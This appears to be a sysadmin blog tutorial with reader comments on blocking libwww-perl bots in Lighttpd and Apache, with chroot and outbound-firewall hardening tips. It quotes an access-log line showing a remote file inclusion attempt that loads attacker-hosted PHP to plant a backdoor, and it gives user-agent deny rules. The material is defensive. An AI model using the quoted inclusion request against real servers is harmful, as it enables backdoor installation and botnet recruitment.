The rise of bots, spammers, crack attacks and libwww-perl
libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.
Verify bots...
Following is a typical example, you will find in your apache or lighttpd access.log log file:
$ grep 'libwww-perl' access.log
OR
$ grep 'libwww-perl' /var/log/lighttpd/access.log
Output:
62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.
You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail
How to block libwww-perl under Lighttpd web server?
Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}
Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart
How to block libwww-perl under Apache web server?
Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots
How do I verify that User-Agent libwww-perl is blocked?
Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl
Output:
Error: 403 Forbidden
You should see 403 Forbidden error as your user-agent is blocked by server configuration.
Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.
Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.
Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).
What do you think? How do you block such attacks? Please share your nifty technique with us.
You may also be interested in other helpful articles:
- Protecting Linux against automated attackers
- Installing and configuring lighttpd webserver - HOWTO
- How Install and setup a honeypot
- Linux mail server: How to fight image spam
- Quick tip: Perl One Liners
Discussion on This Article:
Leave a Reply
We encourage your comments, and suggestions. But please stay on topic, be polite, and avoid spam. Thank you very much for stopping by our site!
Blocking LWP::UserAgent by agent name is like painting a lock on your door and saying it’s secure. Dumb. Really dumb. Not worth the time, and surprised you suggested it.
Randal,
Blocking user agent can help, but spammers spoof user agents. Just suggested solution; there are tons of dumb spammers too they don’t change there user agent so I do block them
Real solution is chrooted jail.
Appreciate your post.
Good one, I wrote a similar easier techique here:
Blocking bots and scanners with htaccess
there is an other solution , if this soft read all link in a page, you can just put a non viewable link on the page, and when this link is call, you ban the ip of the bot.